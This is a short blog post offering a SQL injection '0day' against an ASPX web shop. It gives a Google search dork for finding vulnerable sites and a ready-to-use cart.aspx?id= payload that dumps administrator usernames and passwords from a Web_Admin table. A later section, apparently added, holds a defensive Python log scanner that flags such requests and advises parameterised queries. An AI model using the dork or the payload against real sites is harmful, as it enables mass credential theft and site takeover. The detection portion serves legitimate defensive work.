Hunter丶Blog

0day that dumps passwords: an efficient 0day route to a webshell

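Here is a 0day for an ASPX website application. The method is simple: it dumps the administrator password directly.

It also works through an injection vulnerability.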

Google search keyword: inurl:scoreindex.aspx



Exploit code



cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 — 
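For site owners, the request above is easy to spot in web server logs, because the `id` parameter of cart.aspx carries SQL text instead of a number and the comparison with 0 forces a type-conversion error that echoes the selected values. The following is an added example, not part of the original post: a log check that flags any cart.aspx request whose `id` is not a plain integer. The log layout, sample lines, IP addresses and function names are constructed for illustration, and treating a 5xx status as the error response is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in a simplified W3C-style layout (assumed field order):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:01 192.0.2.10 GET /cart.aspx act=buy&id=17 200
2024-01-01 10:00:05 198.51.100.7 GET /cart.aspx act=buy&id=1+and+(Select+Top+1+char(124)%2BisNull(cast([Name]+as+varchar(8000)),char(32))+From+[Web_Admin])>0 500
2024-01-01 10:00:09 198.51.100.7 GET /cart.aspx act=buy&id=1%2520and%25201=1 200
2024-01-01 10:00:12 192.0.2.11 GET /scoreindex.aspx - 200
""".splitlines()

# T-SQL keywords and punctuation that have no place in a numeric product id.
SQL_TOKEN = re.compile(
    r"\b(select|union|cast|convert|isnull|char|from|and|or)\b|--|[();\[\]]", re.I)

def normalise(value, rounds=3):
    """Undo '+'-for-space and nested percent-encoding (e.g. %2520)."""
    value = value.replace("+", " ")
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_line(line):
    """Return a finding dict for a suspicious cart.aspx request, else None."""
    date, time, ip, method, stem, query, status = line.split()
    if not stem.lower().endswith("/cart.aspx"):
        return None
    # Split on the first '=' only, so '=' inside a value is preserved.
    params = dict(p.partition("=")[::2] for p in query.split("&"))
    if "id" not in params:
        return None
    value = normalise(params["id"])
    if re.fullmatch(r"\d{1,10}", value):
        return None  # the only shape a product id should have
    tokens = sorted({m.group(0).lower() for m in SQL_TOKEN.finditer(value)})
    return {"ip": ip, "time": f"{date} {time}", "id": value,
            "sql_tokens": tokens, "server_error": status.startswith("5")}

def scan(lines):
    """Run check_line over every log line and keep only the findings."""
    return [f for f in map(check_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Detection only tells you the parameter is being probed; the fix belongs in the application, which should parse `id` as an integer and pass it to the database as a query parameter rather than concatenating it into the SQL string.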
